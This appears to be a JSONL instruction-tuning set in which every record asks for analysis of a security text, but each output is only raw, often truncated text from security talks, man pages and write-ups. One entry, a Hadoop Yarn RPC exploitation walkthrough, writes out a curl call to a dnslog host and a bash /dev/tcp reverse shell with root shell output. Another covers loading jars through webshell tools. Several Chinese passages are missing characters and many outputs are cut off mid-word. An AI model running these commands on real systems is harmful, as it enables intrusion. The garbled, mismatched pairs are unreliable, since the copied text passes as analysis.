{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTranscending Cloud Limitations by Obtaining Inner Piece WITH DEEPACK CHOPPA Who am I? I am the terror that flaps in the night The modren man (secret secret) Just this crazy guy, yknow? Cloud Storage Sharing large (10mb+) files w/ friends Availability/Accessibility Replaces USB keys? Backups Cloud Storage: Provider Comparison Service Web Accessible Yes Yes Yes Yes Yes Free Quota Limit 25gb 2gb* 5gb 7gb 5gb API Available Yes Yes Yes Yes Yes History Retention Yes 28 days Yes* (Pro) ? ? Quota Counts Δs Yes No ? N/A ? Data Representation Data Representation Data Representation The moment youve all been waiting for The Vulnerability Time Representation Time Space Time Representation Time Space Account Use Time Representation Time Space Account Use Time Representation Time Space Account Use Mechanism of Action I SIZE-quota Storage TIME-limit History 2 Independent Quota Measurement Dimensions = Unlimited Storage* *Technically limited by provider upload bandwidth Mechanism of Action II Storage: Take a large file Cut it up into fragments Upload each fragment as a version Top it off with an 0b-sized chunk Retrieval: Pull & concat all versions in uploaded order Time Representation II Time Representation II Enlarged to show texture Time Representation II Enlarged to show texture Account Use Time Representation II Enlarged to show texture Account Use Vertical Storage Management Framework Introducing: DeePack Choppa What is it? Pluggable Service Framework Abstracts out API/Implementation Specifics Maintains storage db backend Provides CLI access to core functions Demo Its been running the whole time Aftermath What can be done? Blue-Team Concerns I Detection Method Constantly Rewriting Fixed Size/Time/Name API Key Ban Whackamole Null Caps Countermeasure Generators to introduce variability & flexibility Get a new one 1-byte? Blue-Team Concerns II Unlimited space undermines business model Barring large binary writes may break existing compatibility encfs, git, etc. Deep analysis is t", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntracepath === 追踪目的主机经过的路由信息 ## 补充说明 **tracepath命令** 用来追踪并显示报文到达目的主机所经过的路由信息 ### 语法 ```shell tracepath(参数) ``` ### 参数 * 目的主机指定追踪路由信息的目的主机 * 端口指定使用的UDP端口号 ### 实例 ```shell tracepath www.58.com 1: 192.168.2.10 (192.168.2.10) 20.150ms pmtu 1500 1: unknown (192.168.2.1) 9.343ms 2: 221.6.45.33 (221.6.45.33) 34.430ms 3: 221.6.9.81 (221.6.9.81) 19.263ms 4: 122.96.66.37 (122.96.66.37) 54.372ms 5: 219.158.96.149 (219.158.96.149) asymm 6 128.526ms 6: 123.126.0.66 (123.126.0.66) 138.281ms 7: 124.65.57.26 (124.65.57.26) 166.244ms 8: 61.148.154.98 (61.148.154.98) 103.723ms 9: 202.106.42.102 (202.106.42.102) asymm 10 78.099ms 10: 210.77.139.150 (210.77.139.150) asymm 9 199.930ms 11: 211.151.104.6 (211.151.104.6) asymm 10 121.965ms 12: no reply 13: 211.151.111.30 (211.151.111.30) asymm 12 118.989ms reached Resume: pmtu 1500 hops 13 back 12 ```", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Wireless Networks of the Future: Security in Cognitive Radio Networks Hunter Scott / August 3, 2013 Radio + Software Defined Radio Cognitive Radio + Cognitive Radio Network Cognitive Engine Center Frequency Bandwidth Transmit power Type of modulation Coding rate Channel access protocol Encryption algorithm Frame size Attacks specific to cognitive radio networks Change cognitive messages being sent through network Change cognitive messages being sent through network Incumbent on channel 6 Incumbent on channel 6 Change cognitive messages being sent through network Incumbent on channel 1 Change cognitive messages being sent through network Incumbent on channel 1 Change cognitive messages being sent through network Recalculating Change cognitive messages being sent through network Routing Disruption Sybil Attack Sybil Attack Sybil Attack Sybil Attack Priority Attack > Attacks on Crypto VS Attacks on Data Privacy Primary User Emulation Primary User Emulation Primary User Emulation Primary user on channel 4 Primary user on channel 4 Primary user on channel 4 Primary user on channel 4 Primary User Emulation Primary user on channel 4 Primary User Emulation Recalculating Countermeasures Cooperative Intrusion Detection Device Reputation Device Location Why this matters Tools Level 30 MHz to 4.4 GHz 60 mW SimpliciTI Fits Arduino shields ~$100 in quantity MyriadRF ($300) Other tools HackRF ($300) Michael Ossmann Azio BladeRF ($420) Nuand Whats next Latest version of these slides + code & schematics: defcon21.hscott.net Image Credits: Radio designed by Monika Ciapala from The Noun Project Radio Tower designed by iconoci from The Noun Project Brain designed by Samuel Dion-Girardeau from The Noun Project Person designed by Björn Andersson from The Noun Project Plant designed by Luke Anthony Firth from The Noun Project Lock from The Noun Project Speedometer designed by Volodin Anton from The Noun Project Location designed by Ricardo Moreira from The Noun Project Further Rea", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n#BHUSA @BlackHatEvents UWB Real Time Locating Systems Andrea Palanca Luca Cremona Roya Gordon labs@nozominetworks.com How Secure Radio Communications May Fail in Practice  2022 Nozomi Networks Inc. 2 Overview 01 02 03 04 Methodology of Research Attack Demos Remediations 05 Summary & Key Takeaways Introduction Introduction 4 Wireless communication systems are susceptible to various security threats that can compromise their reliability and impact production operations Introduction  Ideal for short-range devices  Can transmit information quickly over short distances  Ability to send data through solid objects like walls and other barriers  UWB is the preferred communication protocol for RTLS Spectral density for UWB and narrowband - Source: FiRa Consortium UWB  2022 Nozomi Networks Inc. 5 Wireless communication systems are susceptible to various security threats that can compromise their reliability and impact production operations Introduction  Contd  Uses UWB signals to locate stationary/mobile objects  3 components:  Tags  Anchors  Server that computes, shows and stores tag positions  The time of arrival is analyzed to determine the position of a tag RTLS Anchors RTLS Server Tag Ts_1 Ts_2 Ts_3 Ts_4 UWB Ethernet, or Wi-Fi, or other media Operation of an UWB TDoA RTLS  2022 Nozomi Networks Inc. 6 Wireless communication systems are susceptible to various security threats that can compromise their reliability and impact production operations Introduction  Contd Networks will be vulnerable to attacks by cyber criminals who are seeking to exploit vulnerabilities in order to gain access to sensitive data or disrupt operations. Cyber Threats Source: FiRa Consortium  2022 Nozomi Networks Inc. Motivation According to the FiRa consortium, in 2018 there was an increased demand for improvements to existing modulations to increase the integrity and accuracy of ranging measurements Motivation This is what motivated us to take a deeper look into how threat actors can exploit this ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 OWASP 代码审计指南 V2.0 中文版 注本指南版权归 OWASP Foundation 所有由刘传兴孙维康翻译仅供业内人士学习参考 2 目 录 1 介绍 ......................................................................................................................................................... 10 1.1 前言 ................................................................................................................................................ 10 1.2 介绍 ................................................................................................................................................ 11 1.2.1 主要内容 ............................................................................................................................... 11 1.3 如何使用本文档 .......................................................................................................................... 11 2 相关技术和方法 .................................................................................................................................. 13 2.1 代码安全审计 .............................................................................................................................. 13 2.1.1 代码审计技术参考 ............................................................................................................. 13 2.1.2 为什么代码有漏洞 ........................................................................................................ 14 2.1.3 什么是代码安全审计 ................................................................................................... 16 2.1.4 代码审计和代码安全审计的区别是什么 ............................................................... 17 2.1.5 确定安全源代码审计的规模 ...................................................................................... 17 2.1.6 我们无法保证自己的安全 ............................................................................................... 20 2.1.7 耦合源代码审计和渗透测试 .......................................................................................... 22 2.1.8 代码审计对开发实践的潜在优势 .................................................................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBoutique Kit Playing WarGames with expensive rootkits and malware Josh m0nk Thomas Opening Question Hands up if you run Android Keep em up if you run a custom ROM / Kernel Down if you actually compiled it Back up if you didnt look at the source Back up if you didnt do a FULL source audit Dont lie, Santa Claus and the NSA already know the answer  Josh m0nk Thomas  @m0nk_dot  Paid by the epic people @ Accuvant Labs  Used to get paid by other folk in a prior life  Q: Why listen to me?  A: TBH, Not a damn clue  Current slides can always be found here:  https://github.com/monk-dot/David-Byrne.git ./whoami echo $AGENDA Boring Kit  The public space of rootkits and malware No Name Given: Non Public Players and the new rules War Game 1: Hide deep, hide long War Game 2: Run off the processing grid War Game 3: Is it cold in here? Revisiting Tic-tac-toe: The fun we can have BORING KIT The public space of rootkits and malware Im sure its fascinating but Uber 1337 h4x0r <3 teh Malwarez NO NAME GIVEN Non Public Players and the new rules Nameless people doing interesting things Out come the Androids Cost of the game Rules of the game WAR GAME 1 Hide deep, hide long NandX  OMG - Text Content goes here Stop  Demo Time! WAR GAME 2 Run off the processing grid Clock Locking Beats WAR GAME 3 Is it cold in here? Project Burner REVISITING TIC-TAC-TOE The fun we can have  And here! Stuff Goes here Questions? https://github.com/monk-dot/David-Byrne.git Josh Thomas @m0nk_dot jthomas@accuvant.com Whatever fin 1125 17th Street, Suite 1700, Denver, CO 80202 800.574.0896 sales@accuvant.com www.accuvant.com", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" Copyright (C) 2001 Andries Brouwer <aeb@cwi.nl>. .\\\" .\\\" Permission is granted to make and distribute verbatim copies of this .\\\" manual provided the copyright notice and this permission notice are .\\\" preserved on all copies. .\\\" .\\\" Permission is granted to copy and distribute modified versions of this .\\\" manual under the conditions for verbatim copying, provided that the .\\\" entire resulting derived work is distributed under the terms of a .\\\" permission notice identical to this one .\\\" .\\\" Since the Linux kernel and libraries are constantly changing, this .\\\" manual page may be incorrect or out-of-date. The author(s) assume no .\\\" responsibility for errors or omissions, or for damages resulting from .\\\" the use of the information contained herein. The author(s) may not .\\\" have taken the same level of care in the production of this manual, .\\\" which is licensed free of charge, as they might when working .\\\" professionally. .\\\" .\\\" Formatted or processed versions of this manual, if unaccompanied by .\\\" the source, must acknowledge the copyright and authors of this work. .\\\" .TH LOCKFILE 3 2001-10-18 \"\" \"Linux Programmer's Manual\" .SH NAME flockfile, ftrylockfile, funlockfile \\- 为标准输入输出锁定文件 FILE .SH \"SYNOPSIS 总览\" .nf .B #include <stdio.h> .sp .BI \"void flockfile(FILE *\" filehandle ); .br .BI \"int ftrylockfile(FILE *\" filehandle ); .br .BI \"void funlockfile(FILE *\" filehandle ); .fi .SH \"DESCRIPTION 描述\" 标准输入输出库 stdio 函数是线程安全的这是通过为每个文件对象 FILE 赋予一个锁定计数和 (当锁定计数非零时) 一个所有者线程来实现的对每个库函数调用这些函数等待直到文件对象 FILE 不再被一个不同的线程锁定然后锁定它进行所需的 I/O 操作再次对它解锁 .LP (注意这个锁定与由函数 .BR flock (2) 和 .BR lockf (3) 实现的锁定无关) .LP 所有这些操作对 C 程序员来说都是不可见的但是有两种理由需要进行更加细节的控制其一也许某个线程需要进行不可分割的一系列 I/O 操作不应当被其他线程的 I/O 所终端其二出于效率因素应当避免进行过多的锁定来提高效率 .LP 为此一个线程可以显式地锁定文件对象 FILE接着进行它的一系列 I/O 操作然后解锁这样可以避免其他线程干扰如果这样做的原因是需要达到更高的效率应当使用 stdio 函数的非锁定版本来进行 I/O 操作使用 \\fIgetc_unlocked\\fP() 和 \\fIputc_unlocked\\fP() 来代替 \\fIgetc\\fP() 和 \\fIputc\\fP() .LP 函数 \\fBflockfile()\\fP 等待 *\\fIfilehandle\\fP 不再被其他的线程锁定然后使当前线程成为 *\\fIfilehandle\\", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1998 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: regexp.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '\\\" Start of description of a specific option. cmdName gives the '\\\" op", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2022*CTF-Web 写在前 XCTF国际赛系列直不错周末参与了下这次赛虽然没有Java但总体还是蛮有意思 这没按题顺序写只是写了在我中从上到下的排序对有源码的题做了备份 oh-my-lotto 链接: https://pan.baidu.com/s/1G53aYqIIbHGlowdWFhkKqw 提取码: oism oh-my-lotto 中较有趣的题呗重之我是赌神 这是个预期因为后又上了个revenge简单分析下题先看看docker内容可以知 道概的结构 version: \"3\" services: lotto: build: context: lotto/ dockerfile: Dockerfile container_name: \"lotto\" 之后看看代码这有三个路由从短到长 先result路由返回 /app/lotto_result.txt 件内容结果 forecast 路由可以上传个件保存到 /app/guess/forecast.txt app: build: context: app/ dockerfile: Dockerfile links: - lotto container_name: \"app\" ports: - \"8880:8080\" @app.route(\"/result\", methods=['GET']) def result(): if os.path.exists(\"/app/lotto_result.txt\"): lotto_result = open(\"/app/lotto_result.txt\", 'rb').read().decode() else: lotto_result = '' return render_template('result.html', message=lotto_result) @app.route(\"/forecast\", methods=['GET', 'POST']) def forecast(): message = '' if request.method == 'GET': return render_template('forecast.html') elif request.method == 'POST': if 'file' not in request.files: message = 'Where is your forecast?' 还有最关键的lotto路由(代码太多就不放完了)可以 如果预测的值与环境随机成的相等就能获得flag file = request.files['file'] file.save('/app/guess/forecast.txt') message = \"OK, I get your forecast. Let's Lotto!\" return render_template('forecast.html', message=message) os.system('wget --content-disposition -N lotto') @app.route(\"/lotto\", methods=['GET', 'POST']) def lotto(): elif request.method == 'POST': //看到flag从环境变量当中取出 flag = os.getenv('flag') lotto_key = request.form.get('lotto_key') or '' lotto_value = request.form.get('lotto_value') or '' lotto_key = lotto_key.upper() if safe_check(lotto_key): os.environ[lotto_key] = lotto_value try: //从内http://lotto当中获得随机值 os.system('wget --content-disposition -N lotto') if os.path.exists(\"/app/lotto_result.txt\"): lotto_result = open(\"/app/lotto_result.txt\", 'rb').read() else: lotto_result = 'result' if os.path.exists(\"/app/guess/forecast.txt\"): 其中内的lotto页可以看到就是随机成20个40以内随机数并返回 同时对于我们能控制的环境变量也有过滤 safe_check 那像p之前提到的直接RCE就不 了 forecast = open(\"/app/guess/f", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Windows CE san@nsfocus.com san@xfocus.org Structure Overview  Windows CE Overview  Windows CE Memory Management  Windows CE Processes and Threads  Windows CE API Address Search Technology  The Shellcode for Windows CE  Windows CE Buffer Overflow Demonstration  About Decoding Shellcode  Conclusion  Reference Windows CE Overview(1)  Windows CE is a very popular embedded operating system for PDAs and mobiles  Windows developers can easily develop applications for Windows CE  Windows CE 5.0 is the latest version  This presentation is based on Windows CE.net(4.2)  Windows Mobile Software for Pocket PC and Smartphone are also based on the core of Windows CE  By default Windows CE is in little-endian mode Part 1/7 Windows CE Overview(2)  ARM Architecture  RISC  ARMv1 - ARMv6  ARM7, ARM9, ARM10 and ARM11  7 processor modes  37 registers  15 general-purpose registers are visible at any one time  r13(sp), r14(lr)  r15(pc) can access directly Memory Management(1) Part 2/7 Memory Management(2)  Windows CE uses ROM (read only memory), RAM (random access memory)  The ROM in a Windows CE system is like a small read-only hard disk  The RAM in a Windows CE system is divided into two areas: program memory and object store  Windows CE is a 32-bit operating system, so it supports 4GB virtual address space  Upper 2GB is kernel space, used by the system for its own data Memory Management(3)  Lower 2GB is user space  0x42000000-0x7FFFFFFF memory is used for large memory allocations, such as memory- mapped files  0x0-0x41FFFFFF memory is divided into 33 slots, each of which is 32MB Memory Management(4)  Slot 0 layout Processes and Threads(1)  Windows CE limits 32 processes being run at any one time  Windows CE restricts each process to its own code and data  Every process at least has a primary thread associated with it upon starting (even if it never explicitly created one)  A process can created any number of additional threads (only limited by available memory)  Each thread belo", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ndef KSA(key): keylength = len(key) S = range(256) j = 0 for i in range(256): j = (j + S[i] + key[i % keylength]) % 256 S[i], S[j] = S[j], S[i] # swap return S def PRGA(S): i = 0 j = 0 while True: i = (i + 1) % 256 j = (j + S[i]) % 256 S[i], S[j] = S[j], S[i] # swap K = S[(S[i] + S[j]) % 256] yield K def RC4(key): S = KSA(key) return PRGA(S)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n1 JarLoader模块的细节问题 前 正 冰蝎 哥斯拉 实验 @yzddmr6 As-Exploits v 1.2 更新了个JarLoader模块可以在内存中直接加载个jar件不落地今天来 讲讲开发的细节 打个jar进去通常有两个处 是可以来上传数据库驱动 是把恶意类打JVM中后续只需要通过反射调即可哥斯拉的实现式就是第次就把所有的 payload打jvm中后续通过反射调所以后续通信的流量包都常的只需要传递参数即可 冰蝎跟哥斯拉都有类似的功能研究了下他们的实现 冰蝎的加载jar功能内嵌于数据库连接部分仅于上传数据库驱动先把要打的jdbc上传到标的临 时录然后再URLClassLoader去加载这贴下代码 net.rebeyond.behinder.ui.controller.DatabaseViewController#loadDriver 前 正 冰蝎 1 private void loadDriver(String scriptType, String databaseType) throws Exception { 2 String driverPath = \"net/rebeyond/behinder/resource/drive r/\"; 3 Platform.runLater(() -> { 4 this.statusLabel.setText(\"正在上传数据库驱动\"); 5 }); 6 String os = this.currentShellService.shellEntity.getString( \"os\").toLowerCase(); 2 7 //根据系统型号选择临时录 8 String remoteDir = os.indexOf(\"windows\") >= 0 ? \"c:/window s/temp/\" : \"/tmp/\"; 9 String libName = null; 10 if (scriptType.equals(\"jsp\")) { //根据类型选择数据库jdbc 11 if (databaseType.equals(\"sqlserver\")) { 12 libName = \"sqljdbc41.jar\"; 13 } else if (databaseType.equals(\"mysql\")) { 14 libName = \"mysql-connector-java-5.1.36.jar\"; 15 } else if (databaseType.equals(\"oracle\")) { 16 libName = \"ojdbc5.jar\"; 17 } 18 } else if (scriptType.equals(\"aspx\")) { 19 if (databaseType.equals(\"mysql\")) { 20 libName = \"mysql.data.dll\"; 21 } else if (databaseType.equals(\"oracle\")) { 22 libName = \"Oracle.ManagedDataAccess.dll\"; 23 } 24 } 25 26 byte[] driverFileContent = Utils.getResourceData(driverPath + libName); 27 String remotePath = remoteDir + libName; 28 //将jar先上传到临时录 29 this.currentShellService.uploadFile(remotePath, driverFileC ontent, true); 30 Platform.runLater(() -> { 31 this.statusLabel.setText(\"驱动上传成功正在加载驱动\"); 32 }); 33 //将libPath传递给服务端加载 34 JSONObject loadRes = this.currentShellService.loadJar(remot ePath); 35 if (loadRes.getString(\"status\").equals(\"fail\")) { 36 throw new Exception(\"驱动加载失败:\" + loadRes.getString(\"m sg\")); 37 } else { 38 Platform.runLater(() -> { 39 if (scriptType.equals(\"jsp\")) { 40 this.statusLabel.setText(\"驱动加载成功请再次点击连 接\"); 3 webshell获取到libPath然后URLClassLoader去加载 n", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJavaScript在网络安全 中的身影 高佳 关于我 职位:斗象科技高级安全研究员 主要负责:众测项目的上线与漏洞审核  第一部分 JavaScript的重要性  第二部分 JavaScript的信息收集  第三部分 JavaScript的前端加密  第四部分 JavaScript的混淆与反混淆 目录 JavaScript的重要性 JavaScript的重要性 没有人比我更懂JavaScript JavaScript的重要性 JavaScript的重要性 大人时代变了 JavaScript的信息收集 JavaScript的信息搜集-URL JavaScript的信息搜集-API JavaScript的信息搜集-密码 JavaScript的信息搜集-业务逻辑 JavaScript的信息搜集 JavaScript的信息搜集 JavaScript的信息搜集 JavaScript的前端加密 JavaScript的前端加密-RSA JavaScript的前端加密-RSA JavaScript的前端加密-RSA JavaScript的前端加密-RSA JavaScript的前端加密-RSA JavaScript的前端加密-签名校验 JavaScript的前端加密-签名校验 JavaScript的前端加密-签名校验 JavaScript的前端加密-签名校验 JavaScript的前端加密-签名校验 JavaScript的前端加密-签名校验 JavaScript的混淆与反混淆 JavaScript的混淆与反混淆 我看你就是在为难我胖虎 JavaScript的混淆方式 JavaScript的混淆方法 变量混淆 JavaScript的混淆方法 字符串混淆 JavaScript的混淆方法 EVAL混淆 JavaScript的EVAL反混淆 JavaScript的EVAL反混淆 JavaScript的EVAL反混淆 JavaScript的混淆方法 函数数组对象的混淆 JavaScript的OB反混淆 JavaScript的OB反混淆 JavaScript的OB反混淆 Thank You", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Hadoop Yarn RPC未授权访问漏洞 ## 漏洞简述 Hadoop Yarn作为Hadoop核心组件之一负责将资源分配至各个集群中运行各种应用程序并调度不同集群节点上的任务执行Hadoop Yarn默认对外开放RPC服务攻击者可利用RPC服务执行任意命令控制服务器 同时由于Hadoop Yarn RPC服务访问控制机制开启方式与REST API不一样因此即使在 REST API有授权认证的情况下RPC服务所在端口仍然可以未授权访问 ## 环境搭建 > https://github.com/vulhub/vulhub/tree/master/hadoop/unauthorized-yarn 需要修改docker-compose.yml添加8032端口映射 ![image-20220726135831239](../../.gitbook/assets/image-20220726135831239.png) curl请求8032端口 ``` [root@localhost tmp]# curl http://192.168.32.183:8032 It looks like you are making an HTTP request to a Hadoop IPC port. This is not the correct port for the web interface on this daemon. ``` ## 漏洞利用 EXPhttps://github.com/cckuailong/YarnRpcRCE ``` [root@localhost YarnRpcRCE-master]# java -jar YarnRpcUnauth.jar 192.168.32.183:8032 \"curl 0dccw6.dnslog.cn\" log4j:WARN No appenders could be found for logger (org.apache.hadoop.util.Shell). log4j:WARN Please initialize the log4j system properly. log4j:WARN See http://logging.apache.org/log4j/1.2/faq.html#noconfig for more info. ``` ![image-20220726143734307](../../.gitbook/assets/image-20220726143734307.png) 查看日志 ![image-20220726144048169](../../.gitbook/assets/image-20220726144048169.png) 反弹shell ``` [root@localhost YarnRpcRCE-master]# java -jar YarnRpcUnauth.jar 192.168.32.183:8032 \"bash -i >& /dev/tcp/192.168.32.183/9999 0>&1\" ``` 成功建立连接 ``` [root@localhost tmp]# nc -lvp 9999 Ncat: Version 7.50 ( https://nmap.org/ncat ) Ncat: Listening on :::9999 Ncat: Listening on 0.0.0.0:9999 Ncat: Connection from 172.19.0.5. Ncat: Connection from 172.19.0.5:59812. bash: cannot set terminal process group (271): Inappropriate ioctl for device bash: no job control in this shell <00863_0003/container_1658816800863_0003_01_000001# whoami whoami root <00863_0003/container_1658816800863_0003_01_000001# ``` ## 漏洞修复 1. Apache Hadoop官方建议用户开启Kerberos认证 2. 设置 Hadoop RPC服务所在端口仅对可信地址开放 3. 建议升级并启用Kerberos的认证功能阻止未经授权的访问", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nA DIRTY LITTLE HISTORY Bypassing Spectre Hardware Defenses to Leak Kernel Data 1 2 Vrije Universiteit Amsterdam Enrico Barberis Herbert Bos Cristiano Giuffrida Marius Muench Pietro Frigo 2 TL;DR  Spectre affects most modern CPUs  You can leak data across privilege levels (e.g., User-to-Kernel)  CPU vendors released HW defenses to thwart exploitation  But do they actually work? 3 4 Outline  Spectre-101  Bypassing Spectre Hardware Defenses  Branch History Injection  Exploit + Live Demo 5 Spectre-101 6 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU array[x] 0 1 2 128 ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU 0 1 2 128 array[0] ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU 0 1 2 128 array[0] ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU 0 1 2 128 array[1] ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU 0 1 2 128 array[2] ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU 0 1 2 128 256 array[256] ... 7 Spectre 101 if (x < array.size) // size = 128 y = array[x]; BPU Speculative OOB read 0 1 2 128 256 array[256] ... 7 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z = reload_buff[y]; BPU 0 1 2 128 256 array[256] ... 8 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z = reload_buff[y]; BPU 0 1 2 128 256 array[256] 0 1 2 256 reload_buff[y] 3 ... ... 8 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z = reload_buff[y]; BPU 0 1 2 128 256 array[256] 0 1 2 256 reload_buff[y] 3 3 ... ... 8 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z = reload_buff[y]; BPU 0 1 2 128 256 array[256] 0 1 2 256 reload_buff[y] 3 3 ... ... 8 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z = reload_buff[y]; BPU 0 1 2 128 256 array[256] 0 1 2 256 reload_buff[y] 3 3 ... ... Cached 8 Spectre & Flush+Reload if (x < array.size) // size = 128 y = array[x]; z", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nHacking Social Lives: MySpace.com Presented By Rick Deacon DEFCON 15 August 3-5, 2007 A Quick Introduction Full-time IT Specialist at a CPA firm located in Beachwood, OH. Part-time Student at Lorain County Community College and the University of Akron. Studying for Bachelors in Computer Information Systems  Networking. Information Technology for 7 years, security for 4 years. Published in 2600 Magazine. Other Interests: Cars, Music Presentation Overview Introduction to MySpace.com Introduction to Cross Site Scripting Evading XSS Filters MySpace Session Information and Hijacking Tools Used to Exploit MySpaces XSS Current 0-Day Exploit and Demonstration Ways to Prevent XSS Attacks Questions Closing Intro to MySpace.com One of the largest social networking sites on the internet with millions of active users. Driven by various dynamic web applications. Blogs, Pictures, Videos, Chat, IM, Searches, Classifieds, Music, Bulletins. Major impact on todays society. Personal Information Source of Social Interaction Television, Radio, Movies and Publications. This Presentation MySpaces Security Vulnerable to many types of attacks. Social Engineering Phishing Packet Capture Viruses Spam Cross Site Scripting Well Known Vulnerabilities Samy Virus Used a worm to Add millions of people using XSS and some clever scripting. QuickTime Virus Spread a MySpace virus by automatically editing profiles and adding phishing links when played. Windows MetaFile Vulnerability Phishing Links Sent through compromised profiles to steal passwords and advertise. Introduction to Cross Site Scripting Vulnerability found in MANY web applications. Also called XSS. Allows code injection HTML, JavaScript, etc. Can be used for phishing or browser exploitation. Can be used for a form of session hijacking and cookie stealing. Can be identified easily with the proper methods. Finding XSS Holes Easiest method is to simply try and insert code into an application. Embed JavaScript into an web application URL to dis", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOpen Data Source Analysis Daniel whopis Burroughs daniel.burroughs@gmail.com About me...  Research Professor  University of Central Florida  College of Engineering  College of Health and Public Affairs  Associate Technology Director  Center for Law Enforcement Technology, Training & Research (LETTR) Related Interests  Pattern recognition in security applications  Network attack detection and classification  Bayesian Multiple Hypothesis Tracking  Detection avoidance  Sensor fusion  Position tracking & estimation  Autonomous navigation  Situational awareness My Inspiration  Broward Horne  Meme Mining for Fun and Profit  DefCon 13  Detection and identification of saturation curves  Which current technologies are about to take off?  What should I spend my time learning? An Example (blatently stolen from Broward Horne's DC13 talk) My Need  When I used to teach...  Students would come to me seeking job search advice  I would do what I could to keep up with trends  Found that craigslist postings were an interesting indicator of what was going on  Not necessarily the best source for jobs  but definitely an interesting sensor (a tiny bit of) Theory  Jobs are a lagging economic indicator  There is a time period between economies changing and the job markets catching up  Hiring someone tends to be long term investment  A lot of craigslist postings are temporary / contract / side jobs  Short term investment  Shorten the lag Why Craigslist?  It's available  Decent categorization  31 job categories, 400 cities in North America  More than just job listings  Significant amount of short-term relevance  Both in job listings and other items & services  Prediction:  This will be a normal to leading indicator of change  This is not the only or best source for data  it is just one example of the many out there Let's look at some data  Initial results  The easy-to-find stuff  More questions than answers  But that is the fun of it Job Postings By Date 02/21/10 02/28/10 03/07/10 03/14/10 03", "category": "text_analysis", "source": "security_papers"}
